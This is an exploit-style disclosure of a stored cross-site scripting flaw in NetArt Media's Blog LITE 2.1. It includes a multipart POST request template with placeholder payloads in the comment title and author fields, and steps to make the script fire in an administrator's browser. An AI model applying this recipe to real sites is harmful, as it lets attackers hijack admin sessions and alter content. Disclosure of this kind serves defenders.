Author : CraCkEr
Website : https://www.netartmedia.net/blog-lite
Vendor : NetArt Media
Software : Blog LITE 2.1
Vuln Type: Stored XSS
Impact : Manipulate the content of the site
Release Notes:
Allow Attacker to inject malicious code into website,
give ability to steal sensitive information,
manipulate data, and launch additional attacks.
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Stored XSS
---------------------------------------------------------
POST /blog/index.php HTTP/2
-----------------------------401019026540470155022776857270
Content-Disposition: form-data; name="title"
[XSS Payload]
-----------------------------401019026540470155022776857270
Content-Disposition: form-data; name="content"
-----------------------------401019026540470155022776857270
Content-Disposition: form-data; name="author"
[XSS Payload]
-----------------------------401019026540470155022776857270
Content-Disposition: form-data; name="email"
-----------------------------401019026540470155022776857270
## Steps to Reproduce:
1. Visit Any Category on the Blog
2. Write a comment (as Guest)
3. Inject your [XSS Payload] in "Comment Title"
4. Inject your [XSS Payload] in "Your Name"
5. Submit
6. By default the Blog Disable your comment for Admin Check
7. Admin Check the [BLOG POSTS] in the Administration Panel on this Path (https://website/blog/admin/index.php?page=posts)
8. When the Admin check the comments on this Path (https://website/blog/admin/index.php?page=comments&id=2)
9. XSS Will Fire and Executed on his Browser
[-] Done
© CraCkEr 2023